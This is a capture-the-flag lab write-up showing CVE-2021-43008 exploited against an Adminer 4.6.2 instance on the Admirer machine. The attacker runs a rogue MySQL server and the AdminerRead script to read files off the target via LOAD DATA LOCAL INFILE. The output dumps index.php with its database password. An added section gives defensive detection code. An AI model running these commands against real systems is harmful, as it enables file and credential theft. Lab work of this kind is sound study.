CVE-2021-43008


A vulnerable Adminer installation has been confirmed on the target web server. The identified vulnerability is [[Admirer_CVE-2021-43008#[CVE-2021-43008](https://nvd.nist.gov/vuln/detail/cve-2021-43008)|CVE-2021-43008]]. In order to exploit it, the target Adminer interface must be made to connect to a rogue MySQL instance; that connection is what allows the data exfiltration.
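The rogue-server mechanism above, seen from the defender's side, as an added example that is not part of this write-up or of the AdminerRead tool: the parser below frames raw MySQL packets, checks whether a client's HandshakeResponse advertises the CLIENT_LOCAL_FILES capability (the bit a MySQL client must set before any server can ask it for a local file, and the bit Adminer's fix stops setting), and flags a server reply whose payload starts with 0xFB, the LOCAL INFILE request a rogue server answers with. The packet layouts and the capability value come from the MySQL protocol, not from this page; every byte string in the block is constructed sample data.

```python
"""
Added example (not part of the original write-up or the AdminerRead tool):
a minimal MySQL protocol parser that surfaces the two facts a defender wants
for CVE-2021-43008:

  1. does a client advertise CLIENT_LOCAL_FILES in its HandshakeResponse, i.e.
     is it willing to upload a local file whenever a server asks for one;
  2. did a server reply to a query with a LOCAL INFILE request (payload byte
     0xFB followed by a path), which is how a rogue server makes the client
     read and upload a file from its own host.

All byte strings below are constructed for the example.
"""
import struct

CLIENT_LOCAL_FILES = 0x00000080  # MySQL capability flag, bit 7
LOCAL_INFILE_REQUEST = 0xFB      # first payload byte of a "send me this file" packet


def parse_packets(stream: bytes):
    """Split a raw MySQL byte stream into (sequence_id, payload) tuples.

    Each packet is a 3-byte little-endian payload length, a 1-byte sequence
    id and then the payload itself. Truncated input raises ValueError.
    """
    packets = []
    offset = 0
    while offset + 4 <= len(stream):
        length = int.from_bytes(stream[offset:offset + 3], "little")
        seq = stream[offset + 3]
        payload = stream[offset + 4:offset + 4 + length]
        if len(payload) != length:
            raise ValueError("truncated MySQL packet at offset %d" % offset)
        packets.append((seq, payload))
        offset += 4 + length
    if offset != len(stream):
        raise ValueError("trailing bytes after last packet")
    return packets


def client_allows_local_infile(handshake_response_payload: bytes) -> bool:
    """Return True if a HandshakeResponse41 payload sets CLIENT_LOCAL_FILES.

    Layout (protocol 4.1): 4-byte capability flags, 4-byte max packet size,
    1-byte charset, 23 reserved bytes, NUL-terminated username, ...
    Only the capability flags are needed here.
    """
    if len(handshake_response_payload) < 4:
        raise ValueError("payload too short to hold capability flags")
    (caps,) = struct.unpack_from("<I", handshake_response_payload, 0)
    return bool(caps & CLIENT_LOCAL_FILES)


def local_infile_requests(server_stream: bytes):
    """Return the file paths a server asked the client to upload.

    A LOCAL INFILE request is a server packet whose payload starts with 0xFB
    followed by the filename. OK (0x00), ERR (0xFF) and result-set packets
    are left alone.
    """
    paths = []
    for _seq, payload in parse_packets(server_stream):
        if payload and payload[0] == LOCAL_INFILE_REQUEST:
            paths.append(payload[1:].decode("utf-8", errors="replace"))
    return paths


def build_packet(seq: int, payload: bytes) -> bytes:
    """Frame a payload as a MySQL packet (used only to build sample data)."""
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload


# Constructed server-to-client stream: an OK packet, then a LOCAL INFILE
# request for /etc/passwd (the path tried in this write-up), then an ERR packet.
SAMPLE_SERVER_STREAM = (
    build_packet(1, b"\x00\x00\x00\x02\x00\x00\x00")          # OK: 0 rows, status 0x0002
    + build_packet(1, b"\xfb/etc/passwd")                     # LOCAL INFILE request
    + build_packet(1, b"\xff\x28\x04#42000Access denied")    # ERR 1064, SQLSTATE 42000
)

# Constructed HandshakeResponse41 payloads that differ only in the
# CLIENT_LOCAL_FILES bit. Base flags: CLIENT_LONG_PASSWORD (0x1),
# CLIENT_PROTOCOL_41 (0x200), CLIENT_SECURE_CONNECTION (0x8000).
_BASE_CAPS = 0x0001 | 0x0200 | 0x8000


def _handshake_response(caps: int) -> bytes:
    # caps, max packet size 16 MiB, charset 33 (utf8), 23 reserved bytes, user
    return (struct.pack("<IIB", caps, 16 * 1024 * 1024, 33)
            + b"\x00" * 23 + b"fake\x00")


EXPOSED_CLIENT = _handshake_response(_BASE_CAPS | CLIENT_LOCAL_FILES)
HARDENED_CLIENT = _handshake_response(_BASE_CAPS)


if __name__ == "__main__":
    print("server asked the client to upload:", local_infile_requests(SAMPLE_SERVER_STREAM))
    print("exposed client advertises LOCAL_FILES :", client_allows_local_infile(EXPOSED_CLIENT))
    print("hardened client advertises LOCAL_FILES:", client_allows_local_infile(HARDENED_CLIENT))
```

Run over a capture of the Adminer host's outbound MySQL traffic, a non-empty result from local_infile_requests() is the signal that a server asked the web host for one of its own files; a client whose handshake never sets CLIENT_LOCAL_FILES cannot be made to answer such a request.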

Rogue MySQL Server


┌──(kali㉿kali)-[~/…/htb/labs/admirer/CVE-2021-43008]
└─$ mysql -u fake -pqwe123 -D rogue
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 401
Server version: 10.6.11-MariaDB-2 Debian n/a
 
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
MariaDB [rogue]> show tables;
+-----------------+
| Tables_in_rogue |
+-----------------+
| dump            |
+-----------------+
1 row in set (0.000 sec)

A rogue MySQL instance has been provisioned and is ready; it holds a database named rogue with a single table, dump.

Error


┌──(kali㉿kali)-[~/…/htb/labs/admirer/CVE-2021-43008]
└─$ python3 AdminerRead.py -t http://admirer.htb/utility-scripts/adminer.php -f /etc/passwd -s -I 10.10.16.8 -u fake -p qwe123 -v
     _       _           _                 ____                _
    / \   __| |_ __ ___ (_)_ __   ___ _ __|  _ \ ___  __ _  __| |
   / _ \ / _` | '_ ` _ \| | '_ \ / _ \ '__| |_) / _ \/ _` |/ _` |
  / ___ \ (_| | | | | | | | | | |  __/ |  |  _ <  __/ (_| | (_| |
 /_/   \_\__,_|_| |_| |_|_|_| |_|\___|_|  |_| \_\___|\__,_|\__,_|   v1.1.0
                                                                 
[Adminer] get_available_drivers(...)
[Adminer]   | driver : server
[Adminer]   | driver : sqlite
[Adminer]   | driver : sqlite2
[Adminer]   | driver : pgsql
[Adminer]   | driver : oracle
[Adminer]   | driver : mssql
[Adminer]   | driver : firebird
[Adminer]   | driver : simpledb
[Adminer]   | driver : mongo
[Adminer]   | driver : elastic
[Adminer] get_version(...)
[Adminer]   | version : 4.6.2
[>] Remote Adminer version : v4.6.2
 
[Adminer] connect(...)
[Adminer]   | driver   : server
[Adminer]   | server   : 10.10.16.8
[Adminer]   | username : fake
[Adminer]   | password : qwe123
[Adminer]   | database : lfr_sink_db
[Adminer] exploit_lfr(...)
[Adminer]   | pathtofile : /etc/passwd
[Adminer] execute_sql_query(...)
[Adminer]   | sql_query  : TRUNCATE TABLE lfr_sink_table; LOAD DATA local INFILE '/etc/passwd' INTO TABLE lfr_sink_table fields TERMINATED BY "\n";
[Adminer]   | token      : 269407:733887
[Adminer] {'results': [], 'messages': [], 'errors': [], 'success': True}
[Adminer] execute_sql_query(...)
[Adminer]   | sql_query  : SELECT * FROM lfr_sink_table;
[Adminer]   | token      : 568554:492042
[Adminer] {'results': [], 'messages': [], 'errors': [], 'success': True}
Traceback (most recent call last):
  File "/home/kali/archive/htb/labs/admirer/CVE-2021-43008/AdminerRead.py", line 325, in <module>
    dump_file(adminer, options.dump_dir, options.file, only_success=options.only_success)
  File "/home/kali/archive/htb/labs/admirer/CVE-2021-43008/AdminerRead.py", line 278, in dump_file
    file = adminer.exploit_lfr(filepath, table)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/archive/htb/labs/admirer/CVE-2021-43008/AdminerRead.py", line 175, in exploit_lfr
    results = self.execute_sql_query("SELECT * FROM lfr_sink_table;")['results'][0]
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^
IndexError: list index out of range

The exploit script fails on the first attempt with an IndexError.

Looking further into the [[Admirer_CVE-2021-43008#Exploit ([AdminerRead](https://github.com/p0dalirius/CVE-2021-43008-AdminerRead))|script]], I found the cause of the failure.

The [[Admirer_CVE-2021-43008#Exploit ([AdminerRead](https://github.com/p0dalirius/CVE-2021-43008-AdminerRead))|script]] comes with a pre-defined database and table, lfr_sink_db and lfr_sink_table, and it was trying to use those rather than the ones on my rogue instance. That is why it failed.

I will change those values to match my instance.

Exploitation


┌──(kali㉿kali)-[~/…/htb/labs/admirer/CVE-2021-43008]
└─$ python3 AdminerRead.py -t http://admirer.htb/utility-scripts/adminer.php -F wordlists/all -s -I 10.10.16.8 -u fake -p qwe123 
     _       _           _                 ____                _
    / \   __| |_ __ ___ (_)_ __   ___ _ __|  _ \ ___  __ _  __| |
   / _ \ / _` | '_ ` _ \| | '_ \ / _ \ '__| |_) / _ \/ _` |/ _` |
  / ___ \ (_| | | | | | | | | | |  __/ |  |  _ <  __/ (_| | (_| |
 /_/   \_\__,_|_| |_| |_|_|_| |_|\___|_|  |_| \_\___|\__,_|\__,_|   v1.1.0
                                                                 
[>] Remote Adminer version : v4.6.2
 
Working... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:04:47

After addressing the issue above, the [[Admirer_CVE-2021-43008#Exploit ([AdminerRead](https://github.com/p0dalirius/CVE-2021-43008-AdminerRead))|exploit script]] runs without error. Yet it does not produce any result with the default wordlist (-F wordlists/all).

The script also supports supplying an individual filename with the -f flag, so I will try that.

┌──(kali㉿kali)-[~/…/htb/labs/admirer/CVE-2021-43008]
└─$ python3 AdminerRead.py -t http://admirer.htb/utility-scripts/adminer.php -f /var/www/html/index.php -s -I 10.10.16.8 -u fake -p qwe123 -v
     _       _           _                 ____                _
    / \   __| |_ __ ___ (_)_ __   ___ _ __|  _ \ ___  __ _  __| |
   / _ \ / _` | '_ ` _ \| | '_ \ / _ \ '__| |_) / _ \/ _` |/ _` |
  / ___ \ (_| | | | | | | | | | |  __/ |  |  _ <  __/ (_| | (_| |
 /_/   \_\__,_|_| |_| |_|_|_| |_|\___|_|  |_| \_\___|\__,_|\__,_|   v1.1.0
                                                                 
[Adminer] get_available_drivers(...)
[Adminer]   | driver : server
[Adminer]   | driver : sqlite
[Adminer]   | driver : sqlite2
[Adminer]   | driver : pgsql
[Adminer]   | driver : oracle
[Adminer]   | driver : mssql
[Adminer]   | driver : firebird
[Adminer]   | driver : simpledb
[Adminer]   | driver : mongo
[Adminer]   | driver : elastic
[Adminer] get_version(...)
[Adminer]   | version : 4.6.2
[>] Remote Adminer version : v4.6.2
 
[Adminer] connect(...)
[Adminer]   | driver   : server
[Adminer]   | server   : 10.10.16.8
[Adminer]   | username : fake
[Adminer]   | password : qwe123
[Adminer]   | database : rogue
[Adminer] exploit_lfr(...)
[Adminer]   | pathtofile : /var/www/html/index.php
[Adminer] execute_sql_query(...)
[Adminer]   | sql_query  : TRUNCATE TABLE dump; LOAD DATA local INFILE '/var/www/html/index.php' INTO TABLE dump fields TERMINATED BY "\n";
[Adminer]   | token      : 709802:222890
[Adminer] {'results': [], 'messages': [], 'errors': [], 'success': True}
[Adminer] execute_sql_query(...)
[Adminer]   | sql_query  : SELECT * FROM dump;
[Adminer]   | token      : 803256:390072
[Adminer] {"num_rows": 123, "fields": ["data"], "values": {"data": ["<!DOCTYPE HTML>", "<!--", "\tMultiverse by HTML5 UP", "\thtml5up.net | @ajlkn", "\tFree for personal and commercial use under the CCA 3.0 license (html5up.net/license)", "-->", "<html>", "\t<head>", "\t\t<title>Admirer</title>", "\t\t<meta charset=\"utf-8\" />", "\t\t<meta name=\"viewport\" content=\"width=device-width, initial-scale=1, user-scalable=no\" />", "\t\t<link rel=\"stylesheet\" href=\"assets/css/main.css\" />", "\t\t<noscript><link rel=\"stylesheet\" href=\"assets/css/noscript.css\" /></noscript>", "\t</head>", "\t<body class=\"is-preload\">", "\u00a0", "\t\t<!-- Wrapper -->", "\t\t\t<div id=\"wrapper\">", "\u00a0", "\t\t\t\t<!-- Header -->", "\t\t\t\t\t<header id=\"header\">", "\t\t\t\t\t\t<h1><a href=\"index.html\"><strong>Admirer</strong> of skills and visuals</a></h1>", "\t\t\t\t\t\t<nav>", "\t\t\t\t\t\t\t<ul>", "\t\t\t\t\t\t\t\t<li><a href=\"#footer\" class=\"icon solid fa-info-circle\">About</a></li>", "\t\t\t\t\t\t\t</ul>", "\t\t\t\t\t\t</nav>", "\t\t\t\t\t</header>", "\u00a0", "\t\t\t\t<!-- Main -->", "\t\t\t\t\t<div id=\"main\">\t\t\t", "\t\t\t\t\t <?php", "                        $servername = \"localhost\";", "                        $username = \"waldo\";", "                        $password = \"&<h5b~yK3F#{PaPB&dA}{H>\";", "                        $dbname = \"admirerdb\";", "\u00a0", "                        // Create connection", "                        $conn = new mysqli($servername, $username, $password, $dbname);", "                        // Check connection", "                        if ($conn->connect_error) {", "                            die(\"Connection failed: \" . 
$conn->connect_error);", "                        }", "\u00a0", "                        $sql = \"SELECT * FROM items\";", "                        $result = $conn->query($sql);", "\u00a0", "                        if ($result->num_rows > 0) {", "                            // output data of each row", "                            while($row = $result->fetch_assoc()) {", "                                echo \"<article class='thumb'>\n\";", "    \t\t\t\t\t\t\techo \"<a href='\".$row[\"image_path\"].\"' class='image'><img src='\".$row[\"thumb_path\"].\"' alt='' /></a>\n\";", "\t    \t\t\t\t\t\techo \"<h2>\".$row[\"title\"].\"</h2>\n\";", "\t    \t\t\t\t\t\techo \"<p>\".$row[\"text\"].\"</p>\n\";", "\t    \t\t\t\t\t    echo \"</article>\n\";", "                            }", "                        } else {", "                            echo \"0 results\";", "                        }", "                        $conn->close();", "                    ?>", "\t\t\t\t\t</div>", "\u00a0", "\t\t\t\t<!-- Footer -->", "\t\t\t\t\t<footer id=\"footer\" class=\"panel\">", "\t\t\t\t\t\t<div class=\"inner split\">", "\t\t\t\t\t\t\t<div>", "\t\t\t\t\t\t\t\t<section>", "\t\t\t\t\t\t\t\t\t<h2>Allow yourself to be amazed</h2>", "\t\t\t\t\t\t\t\t\t<p>Skills are not to be envied, but to feel inspired by.<br>", "\t\t\t\t\t\t\t\t\tVisual arts and music are there to take care of your soul.<br><br>", "\t\t\t\t\t\t\t\t\tLet your senses soak up these wonders...<br><br><br><br>", "\t\t\t\t\t\t\t\t\t</p>", "\t\t\t\t\t\t\t\t</section>", "\t\t\t\t\t\t\t\t<section>", "\t\t\t\t\t\t\t\t\t<h2>Follow me on ...</h2>", "\t\t\t\t\t\t\t\t\t<ul class=\"icons\">", "\t\t\t\t\t\t\t\t\t\t<li><a href=\"#\" class=\"icon brands fa-twitter\"><span class=\"label\">Twitter</span></a></li>", "\t\t\t\t\t\t\t\t\t\t<li><a href=\"#\" class=\"icon brands fa-facebook-f\"><span class=\"label\">Facebook</span></a></li>", "\t\t\t\t\t\t\t\t\t\t<li><a href=\"#\" class=\"icon brands fa-instagram\"><span 
class=\"label\">Instagram</span></a></li>", "\t\t\t\t\t\t\t\t\t\t<li><a href=\"#\" class=\"icon brands fa-github\"><span class=\"label\">GitHub</span></a></li>", "\t\t\t\t\t\t\t\t\t\t<li><a href=\"#\" class=\"icon brands fa-dribbble\"><span class=\"label\">Dribbble</span></a></li>", "\t\t\t\t\t\t\t\t\t\t<li><a href=\"#\" class=\"icon brands fa-linkedin-in\"><span class=\"label\">LinkedIn</span></a></li>", "\t\t\t\t\t\t\t\t\t</ul>", "\t\t\t\t\t\t\t\t</section>", "\t\t\t\t\t\t\t</div>", "\t\t\t\t\t\t\t<div>", "\t\t\t\t\t\t\t\t<section>", "\t\t\t\t\t\t\t\t\t<h2>Get in touch</h2>", "\t\t\t\t\t\t\t\t\t<form method=\"post\" action=\"#\"><!-- Still under development... This does not send anything yet, but it looks nice! -->", "\t\t\t\t\t\t\t\t\t\t<div class=\"fields\">", "\t\t\t\t\t\t\t\t\t\t\t<div class=\"field half\">", "\t\t\t\t\t\t\t\t\t\t\t\t<input type=\"text\" name=\"name\" id=\"name\" placeholder=\"Name\" />", "\t\t\t\t\t\t\t\t\t\t\t</div>", "\t\t\t\t\t\t\t\t\t\t\t<div class=\"field half\">", "\t\t\t\t\t\t\t\t\t\t\t\t<input type=\"text\" name=\"email\" id=\"email\" placeholder=\"Email\" />", "\t\t\t\t\t\t\t\t\t\t\t</div>", "\t\t\t\t\t\t\t\t\t\t\t<div class=\"field\">", "\t\t\t\t\t\t\t\t\t\t\t\t<textarea name=\"message\" id=\"message\" rows=\"4\" placeholder=\"Message\"></textarea>", "\t\t\t\t\t\t\t\t\t\t\t</div>", "\t\t\t\t\t\t\t\t\t\t</div>", "\t\t\t\t\t\t\t\t\t\t<ul class=\"actions\">", "\t\t\t\t\t\t\t\t\t\t\t<li><input type=\"submit\" value=\"Send\" class=\"primary\" /></li>", "\t\t\t\t\t\t\t\t\t\t\t<li><input type=\"reset\" value=\"Reset\" /></li>", "\t\t\t\t\t\t\t\t\t\t</ul>", "\t\t\t\t\t\t\t\t\t</form>", "\t\t\t\t\t\t\t\t</section>", "\t\t\t\t\t\t\t</div>", "\t\t\t\t\t\t</div>", "\t\t\t\t\t</footer>", "\u00a0", "\t\t\t</div>", "\u00a0", "\t\t<!-- Scripts -->", "\t\t\t<script src=\"assets/js/jquery.min.js\"></script>", "\t\t\t<script src=\"assets/js/jquery.poptrox.min.js\"></script>", "\t\t\t<script src=\"assets/js/browser.min.js\"></script>", "\t\t\t<script 
src=\"assets/js/breakpoints.min.js\"></script>", "\t\t\t<script src=\"assets/js/util.js\"></script>", "\t\t\t<script src=\"assets/js/main.js\"></script>", "\u00a0", "\t</body>", "</html>"]}}
┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ data                                                                                                                   ┃
┡━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ <!DOCTYPE HTML>                                                                                                        │
│ <!--                                                                                                                   │
│         Multiverse by HTML5 UP                                                                                         │
│         html5up.net | @ajlkn                                                                                           │
│         Free for personal and commercial use under the CCA 3.0 license (html5up.net/license)                           │
│ -->                                                                                                                    │
│ <html>                                                                                                                 │
│         <head>                                                                                                         │
│                 <title>Admirer</title>                                                                                 │
│                 <meta charset="utf-8" />                                                                               │
│                 <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />               │
│                 <link rel="stylesheet" href="assets/css/main.css" />                                                   │
│                 <noscript><link rel="stylesheet" href="assets/css/noscript.css" /></noscript>                          │
│         </head>                                                                                                        │
│         <body class="is-preload">                                                                                      │
│                                                                                                                        │
│                 <!-- Wrapper -->                                                                                       │
│                         <div id="wrapper">                                                                             │
│                                                                                                                        │
│                                 <!-- Header -->                                                                        │
│                                         <header id="header">                                                           │
│                                                 <h1><a href="index.html"><strong>Admirer</strong> of skills and visua… │
│                                                 <nav>                                                                  │
│                                                         <ul>                                                           │
│                                                                 <li><a href="#footer" class="icon solid fa-info-circl… │
│                                                         </ul>                                                          │
│                                                 </nav>                                                                 │
│                                         </header>                                                                      │
│                                                                                                                        │
│                                 <!-- Main -->                                                                          │
│                                         <div id="main">                                                                │
│                                          <?php                                                                         │
│                         $servername = "localhost";                                                                     │
│                         $username = "waldo";                                                                           │
│                         $password = "&<h5b~yK3F#{PaPB&dA}{H>";                                                         │
│                         $dbname = "admirerdb";                                                                         │
│                                                                                                                        │
│                         // Create connection                                                                           │
│                         $conn = new mysqli($servername, $username, $password, $dbname);                                │
│                         // Check connection                                                                            │
│                         if ($conn->connect_error) {                                                                    │
│                             die("Connection failed: " . $conn->connect_error);                                         │
│                         }                                                                                              │
│                                                                                                                        │
│                         $sql = "SELECT * FROM items";                                                                  │
│                         $result = $conn->query($sql);                                                                  │
│                                                                                                                        │
│                         if ($result->num_rows > 0) {                                                                   │
│                             // output data of each row                                                                 │
│                             while($row = $result->fetch_assoc()) {                                                     │
│                                 echo "<article class='thumb'>                                                          │
│ ";                                                                                                                     │
│                                                         echo "<a href='".$row["image_path"]."' class='image'><img src… │
│ ";                                                                                                                     │
│                                                         echo "<h2>".$row["title"]."</h2>                               │
│ ";                                                                                                                     │
│                                                         echo "<p>".$row["text"]."</p>                                  │
│ ";                                                                                                                     │
│                                                     echo "</article>                                                   │
│ ";                                                                                                                     │
│                             }                                                                                          │
│                         } else {                                                                                       │
│                             echo "0 results";                                                                          │
│                         }                                                                                              │
│                         $conn->close();                                                                                │
│                     ?>                                                                                                 │
│                                         </div>                                                                         │
│                                                                                                                        │
│                                 <!-- Footer -->                                                                        │
│                                         <footer id="footer" class="panel">                                             │
│                                                 <div class="inner split">                                              │
│                                                         <div>                                                          │
│                                                                 <section>                                              │
│                                                                         <h2>Allow yourself to be amazed</h2>           │
│                                                                         <p>Skills are not to be envied, but to feel i… │
│                                                                         Visual arts and music are there to take care … │
│                                                                         Let your senses soak up these wonders...<br><… │
│                                                                         </p>                                           │
│                                                                 </section>                                             │
│                                                                 <section>                                              │
│                                                                         <h2>Follow me on ...</h2>                      │
│                                                                         <ul class="icons">                             │
│                                                                                 <li><a href="#" class="icon brands fa… │
│                                                                                 <li><a href="#" class="icon brands fa… │
│                                                                                 <li><a href="#" class="icon brands fa… │
│                                                                                 <li><a href="#" class="icon brands fa… │
│                                                                                 <li><a href="#" class="icon brands fa… │
│                                                                                 <li><a href="#" class="icon brands fa… │
│                                                                         </ul>                                          │
│                                                                 </section>                                             │
│                                                         </div>                                                         │
│                                                         <div>                                                          │
│                                                                 <section>                                              │
│                                                                         <h2>Get in touch</h2>                          │
│                                                                         <form method="post" action="#"><!-- Still und… │
│                                                                                 <div class="fields">                   │
│                                                                                         <div class="field half">       │
│                                                                                                 <input type="text" na… │
│                                                                                         </div>                         │
│                                                                                         <div class="field half">       │
│                                                                                                 <input type="text" na… │
│                                                                                         </div>                         │
│                                                                                         <div class="field">            │
│                                                                                                 <textarea name="messa… │
│                                                                                         </div>                         │
│                                                                                 </div>                                 │
│                                                                                 <ul class="actions">                   │
│                                                                                         <li><input type="submit" valu… │
│                                                                                         <li><input type="reset" value… │
│                                                                                 </ul>                                  │
│                                                                         </form>                                        │
│                                                                 </section>                                             │
│                                                         </div>                                                         │
│                                                 </div>                                                                 │
│                                         </footer>                                                                      │
│                                                                                                                        │
│                         </div>                                                                                         │
│                                                                                                                        │
│                 <!-- Scripts -->                                                                                       │
│                         <script src="assets/js/jquery.min.js"></script>                                                │
│                         <script src="assets/js/jquery.poptrox.min.js"></script>                                        │
│                         <script src="assets/js/browser.min.js"></script>                                               │
│                         <script src="assets/js/breakpoints.min.js"></script>                                           │
│                         <script src="assets/js/util.js"></script>                                                      │
│                         <script src="assets/js/main.js"></script>                                                      │
│                                                                                                                        │
│         </body>                                                                                                        │
│ </html>                                                                                                                │
└────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┘
[Adminer] {"num_rows": 1, "fields": ["id?", "select_type?", "table?", "partitions?", "type?", "possible_keys?", "key?", "key_len?", "ref?", "rows?", "Extra?"], "values": {"id?": ["1"], "select_type?": ["SIMPLE"], "table?": ["dump"], "partitions?": ["NULL"], "type?": ["ALL"], "possible_keys?": ["NULL"], "key?": ["NULL"], "key_len?": ["NULL"], "ref?": ["NULL"], "rows?": ["123"], "Extra?": ["\u00a0"]}}
┏━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━┳━━━━━━━━━━┳━━━━━━┳━━━━━━━┳━━━━━━━━┓
┃ id? ┃ select_type? ┃ table? ┃ partitions? ┃ type? ┃ possible_keys? ┃ key? ┃ key_len? ┃ ref? ┃ rows? ┃ Extra? ┃
┡━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━╇━━━━━━━━━━╇━━━━━━╇━━━━━━━╇━━━━━━━━┩
│ 1   │ SIMPLE       │ dump   │ NULL        │ ALL   │ NULL           │ NULL │ NULL     │ NULL │ 123   │        │
└─────┴──────────────┴────────┴─────────────┴───────┴────────────────┴──────┴──────────┴──────┴───────┴────────┘
[Adminer] {'results': [{'num_rows': 123, 'fields': ['data'], 'values': {'data': ['<!DOCTYPE HTML>', '<!--', '\tMultiverse by HTML5 UP', '\thtml5up.net | @ajlkn', '\tFree for personal and commercial use under the CCA 3.0 license (html5up.net/license)', '-->', '<html>', '\t<head>', '\t\t<title>Admirer</title>', '\t\t<meta charset="utf-8" />', '\t\t<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />', '\t\t<link rel="stylesheet" href="assets/css/main.css" />', '\t\t<noscript><link rel="stylesheet" href="assets/css/noscript.css" /></noscript>', '\t</head>', '\t<body class="is-preload">', '\xa0', '\t\t<!-- Wrapper -->', '\t\t\t<div id="wrapper">', '\xa0', '\t\t\t\t<!-- Header -->', '\t\t\t\t\t<header id="header">', '\t\t\t\t\t\t<h1><a href="index.html"><strong>Admirer</strong> of skills and visuals</a></h1>', '\t\t\t\t\t\t<nav>', '\t\t\t\t\t\t\t<ul>', '\t\t\t\t\t\t\t\t<li><a href="#footer" class="icon solid fa-info-circle">About</a></li>', '\t\t\t\t\t\t\t</ul>', '\t\t\t\t\t\t</nav>', '\t\t\t\t\t</header>', '\xa0', '\t\t\t\t<!-- Main -->', '\t\t\t\t\t<div id="main">\t\t\t', '\t\t\t\t\t <?php', '                        $servername = "localhost";', '                        $username = "waldo";', '                        $password = "&<h5b~yK3F#{PaPB&dA}{H>";', '                        $dbname = "admirerdb";', '\xa0', '                        // Create connection', '                        $conn = new mysqli($servername, $username, $password, $dbname);', '                        // Check connection', '                        if ($conn->connect_error) {', '                            die("Connection failed: " . 
$conn->connect_error);', '                        }', '\xa0', '                        $sql = "SELECT * FROM items";', '                        $result = $conn->query($sql);', '\xa0', '                        if ($result->num_rows > 0) {', '                            // output data of each row', '                            while($row = $result->fetch_assoc()) {', '                                echo "<article class=\'thumb\'>\n";', '    \t\t\t\t\t\t\techo "<a href=\'".$row["image_path"]."\' class=\'image\'><img src=\'".$row["thumb_path"]."\' alt=\'\' /></a>\n";', '\t    \t\t\t\t\t\techo "<h2>".$row["title"]."</h2>\n";', '\t    \t\t\t\t\t\techo "<p>".$row["text"]."</p>\n";', '\t    \t\t\t\t\t    echo "</article>\n";', '                            }', '                        } else {', '                            echo "0 results";', '                        }', '                        $conn->close();', '                    ?>', '\t\t\t\t\t</div>', '\xa0', '\t\t\t\t<!-- Footer -->', '\t\t\t\t\t<footer id="footer" class="panel">', '\t\t\t\t\t\t<div class="inner split">', '\t\t\t\t\t\t\t<div>', '\t\t\t\t\t\t\t\t<section>', '\t\t\t\t\t\t\t\t\t<h2>Allow yourself to be amazed</h2>', '\t\t\t\t\t\t\t\t\t<p>Skills are not to be envied, but to feel inspired by.<br>', '\t\t\t\t\t\t\t\t\tVisual arts and music are there to take care of your soul.<br><br>', '\t\t\t\t\t\t\t\t\tLet your senses soak up these wonders...<br><br><br><br>', '\t\t\t\t\t\t\t\t\t</p>', '\t\t\t\t\t\t\t\t</section>', '\t\t\t\t\t\t\t\t<section>', '\t\t\t\t\t\t\t\t\t<h2>Follow me on ...</h2>', '\t\t\t\t\t\t\t\t\t<ul class="icons">', '\t\t\t\t\t\t\t\t\t\t<li><a href="#" class="icon brands fa-twitter"><span class="label">Twitter</span></a></li>', '\t\t\t\t\t\t\t\t\t\t<li><a href="#" class="icon brands fa-facebook-f"><span class="label">Facebook</span></a></li>', '\t\t\t\t\t\t\t\t\t\t<li><a href="#" class="icon brands fa-instagram"><span class="label">Instagram</span></a></li>', '\t\t\t\t\t\t\t\t\t\t<li><a 
href="#" class="icon brands fa-github"><span class="label">GitHub</span></a></li>', '\t\t\t\t\t\t\t\t\t\t<li><a href="#" class="icon brands fa-dribbble"><span class="label">Dribbble</span></a></li>', '\t\t\t\t\t\t\t\t\t\t<li><a href="#" class="icon brands fa-linkedin-in"><span class="label">LinkedIn</span></a></li>', '\t\t\t\t\t\t\t\t\t</ul>', '\t\t\t\t\t\t\t\t</section>', '\t\t\t\t\t\t\t</div>', '\t\t\t\t\t\t\t<div>', '\t\t\t\t\t\t\t\t<section>', '\t\t\t\t\t\t\t\t\t<h2>Get in touch</h2>', '\t\t\t\t\t\t\t\t\t<form method="post" action="#"><!-- Still under development... This does not send anything yet, but it looks nice! -->', '\t\t\t\t\t\t\t\t\t\t<div class="fields">', '\t\t\t\t\t\t\t\t\t\t\t<div class="field half">', '\t\t\t\t\t\t\t\t\t\t\t\t<input type="text" name="name" id="name" placeholder="Name" />', '\t\t\t\t\t\t\t\t\t\t\t</div>', '\t\t\t\t\t\t\t\t\t\t\t<div class="field half">', '\t\t\t\t\t\t\t\t\t\t\t\t<input type="text" name="email" id="email" placeholder="Email" />', '\t\t\t\t\t\t\t\t\t\t\t</div>', '\t\t\t\t\t\t\t\t\t\t\t<div class="field">', '\t\t\t\t\t\t\t\t\t\t\t\t<textarea name="message" id="message" rows="4" placeholder="Message"></textarea>', '\t\t\t\t\t\t\t\t\t\t\t</div>', '\t\t\t\t\t\t\t\t\t\t</div>', '\t\t\t\t\t\t\t\t\t\t<ul class="actions">', '\t\t\t\t\t\t\t\t\t\t\t<li><input type="submit" value="Send" class="primary" /></li>', '\t\t\t\t\t\t\t\t\t\t\t<li><input type="reset" value="Reset" /></li>', '\t\t\t\t\t\t\t\t\t\t</ul>', '\t\t\t\t\t\t\t\t\t</form>', 